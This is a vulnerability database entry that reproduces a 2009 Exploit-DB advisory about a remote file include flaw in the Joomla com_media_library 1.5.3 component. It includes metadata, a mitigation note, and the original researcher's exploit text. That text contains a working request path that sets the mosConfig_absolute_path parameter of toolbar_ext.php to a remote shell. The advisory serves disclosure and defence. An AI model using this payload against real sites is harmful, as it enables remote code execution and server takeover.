Joomla com_media_library 1.5.3 Remote File Include

vendor:

com_media_library

by:

xoron

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: com_media_library

Affected Version From: 1.5.3

Affected Version To: 1.5.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla com_media_library 1.5.3 Remote File Include

A vulnerability in Joomla com_media_library 1.5.3 allows remote attackers to include and execute arbitrary local files via a URL in the mosConfig_absolute_path parameter to toolbar_ext.php.

Mitigation:

Upgrade to the latest version of Joomla com_media_library.

Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

  Joomla com_media_library 1.5.3 Remote File Include

  Download: http://ordasoft.com/Download-document/2-MediaLibrary-Basic-1.5.3.html

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
          -> .../com_media_library/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, VoLkan

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2009-06-09]